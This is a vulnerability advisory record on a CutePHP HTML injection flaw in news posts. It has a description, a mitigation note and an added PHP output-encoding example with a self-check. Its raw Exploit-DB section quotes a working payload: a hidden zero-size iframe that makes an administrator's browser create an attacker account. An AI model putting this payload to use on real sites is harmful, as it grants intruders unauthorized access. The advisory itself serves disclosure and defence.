Vendor: CutePHP
By: SecurityFocus
CVSS: 8.8 (HIGH)
CWE: 79 (HTML Injection)
Product Name: CutePHP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

CutePHP HTML Injection Vulnerability

CutePHP is prone to HTML injection attacks due to insufficient sanitization of user-supplied input. Specifically, user-supplied input to news posts is not sufficiently sanitized of malicious HTML code. An attacker can exploit this vulnerability by crafting malicious HTML and submitting it to the vulnerable application.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
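
One way to apply this mitigation to news post bodies, shown as an added example (not CutePHP's own code): everything is HTML-encoded on output, then a small set of attribute-less formatting tags is re-enabled. The function name, the constant and the tag allowlist are assumptions, and the sample post is constructed.

```php
<?php
// Added illustration, not CutePHP code. Function and constant names are hypothetical.

// Assumption: only these attribute-less formatting tags are wanted in posts.
const ALLOWED_TAGS = ['b', 'i', 'u'];

function render_news_body(string $raw): string
{
    // Encode every metacharacter so no submitted markup survives as markup.
    $safe = htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // Re-enable bare allowlisted tags only. An encoded tag carrying any
    // attribute (src=, onload=, ...) cannot match this pattern and stays inert.
    $tags = implode('|', ALLOWED_TAGS);
    $safe = preg_replace('~&lt;(/?(?:' . $tags . '))&gt;~i', '<$1>', $safe);

    // Preserve the author's line breaks.
    return nl2br($safe, false);
}

// Constructed sample post: harmless formatting plus a hidden frame.
$post = "<b>Site update</b>\n"
      . '<iframe src="index.php?action=adduser" height=0 width=0></iframe>';

$html = render_news_body($post);

// The formatting tag survives; the frame is displayed as text, not parsed.
if (strpos($html, '<b>Site update</b>') === false || stripos($html, '<iframe') !== false) {
    fwrite(STDERR, "encoding check failed\n");
    exit(1);
}
echo $html, PHP_EOL;
```

Encoding at output time also covers posts that were stored before the fix was deployed.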

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8060/info

CutePHP is prone to HTML injection attacks. The vulnerability exists due to insufficient sanitization of user-supplied input. Specifically, user-supplied input to news posts is not sufficiently sanitized of malicious HTML code.

<iframe src="index.php?regusername=owned&regpassword= pass&regnickname=owned&regemail=nonenone.com&reglevel= 1&action=adduser&mod=editusers" height=0 width=0 frameborder=0 scrolling=0></iframe>